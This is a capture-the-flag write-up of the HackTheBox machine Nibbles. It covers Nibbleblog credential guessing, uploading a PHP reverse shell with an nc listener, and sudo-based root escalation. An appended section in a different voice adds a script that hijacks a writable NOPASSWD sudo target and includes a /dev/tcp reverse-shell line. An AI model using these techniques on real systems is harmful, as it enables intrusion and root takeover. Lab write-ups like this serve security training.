
writeups · 1 min read

WriteUp – Nibbles (HackTheBox)

Write-up of Nibbles (HackTheBox): simple Linux machine that exploits Nibbleblog 4.0.3 with leaked credentials and RCE via plugin upload, and escalates to root by abusing sudo in the monitor.sh script.

· Manuel López Pérez · writeups


In this post we will solve the Nibbles machine from HackTheBox. It is a very simple Linux machine. My nick on HackTheBox is manulqwerty. If you have any proposal or correction, do not hesitate to leave a comment.

WriteUp

Enumeration

As always, the first step is a port scan with Nmap:

nmap -sC -sV 10.10.10.75

Let's take a look at the web page. Checking its source code, we see the comment:

/nibbleblog/ directory. Nothing interesting here!

So, with no need to fuzz, we find:

http://10.10.10.75/nibbleblog/

That seems to be a Nibbleblog. Let's list the files and directories of a Nibbleblog install: http://www.schizovivek.in/?dir=nibbleblog

We find the Admin Panel on:

http://10.10.10.75/nibbleblog/admin.php

Exploitation

After a couple of attempts we find the credentials:

admin:nibbles

As we see in Settings, the version is Nibbleblog 4.0.3 “Coffee”. We look for exploits for that version: https://curesec.com/blog/article/blog/NibbleBlog-403-Code-Execution-47.html or, with Metasploit, the module exploit/multi/http/nibbleblog_file_upload. Get a shell:

locate webshell
cp /usr/share/webshells/php/php-reverse-shell.php .
# We edit the IP in php-reverse-shell.php
nc -lvp 1234
# We upload the .php using the "My image" plugin of Nibbleblog
# Execute the php on: http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php

Post-Exploitation

We get a TTY shell. With sudo -l we see that we can execute the file /home/nibbler/personal/stuff/monitor.sh as root with no password:
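The escalation the post summarises, as an added example rather than the author's own commands: the sudo rule lets nibbler run monitor.sh as root without a password, and the script lives under nibbler's home directory. The helpers below pull the NOPASSWD targets out of sudo -l output, check whether each target is writable by us (or missing from a directory we can write to), and append our own command to it before running it through sudo. The sudo -l output in SUDO_L_SAMPLE is constructed for the example, modelled on the rule the post reports; that the file is actually writable by nibbler is an assumption the check verifies rather than something the post states.

```shell
#!/bin/sh
# Added example: triage "sudo -l" for NOPASSWD rules whose target script we
# can modify, then hijack one. Constructed sample of sudo -l output, based on
# the rule reported in the write-up (not the machine's real output).
SUDO_L_SAMPLE='Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh'

# nopasswd_targets: read "sudo -l" output on stdin and print the command path
# of every NOPASSWD rule, one per line.
nopasswd_targets() {
    sed -n 's/.*NOPASSWD:[[:space:]]*\([^,[:space:]]*\).*/\1/p'
}

# writable_or_creatable PATH: succeed if PATH exists and we can write it, or
# if it does not exist but its directory is writable (so we can create it).
writable_or_creatable() {
    if [ -e "$1" ]; then
        [ -w "$1" ]
    else
        [ -w "$(dirname "$1")" ]
    fi
}

# hijack_script PATH CMD: append CMD to the script sudo lets us run as root
# (appending keeps whatever the script already did), make sure it is
# executable, then run it through sudo so CMD executes as root.
hijack_script() {
    printf '\n%s\n' "$2" >> "$1"
    chmod +x "$1"
    sudo "$1"
}

# sudo_triage: live version of the check, for use on the target.
sudo_triage() {
    sudo -n -l 2>/dev/null | nopasswd_targets | while read -r t; do
        if writable_or_creatable "$t"; then
            echo "WRITABLE sudo target: $t"
        else
            echo "sudo target not writable: $t"
        fi
    done
}

# Demo on the constructed sample (no sudo needed):
printf '%s\n' "$SUDO_L_SAMPLE" | nopasswd_targets

# On the box, after sudo_triage reports the script as writable, e.g.:
#   hijack_script /home/nibbler/personal/stuff/monitor.sh 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1'
# with a second nc listener on LHOST:LPORT, or simply '/bin/bash' for a root shell on the same TTY.
```

The writability check matters beyond this box: a NOPASSWD rule on a script is only exploitable this way when the script, or the directory that would hold it, is writable by the calling user, which is exactly the case when the script sits in that user's own home directory.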
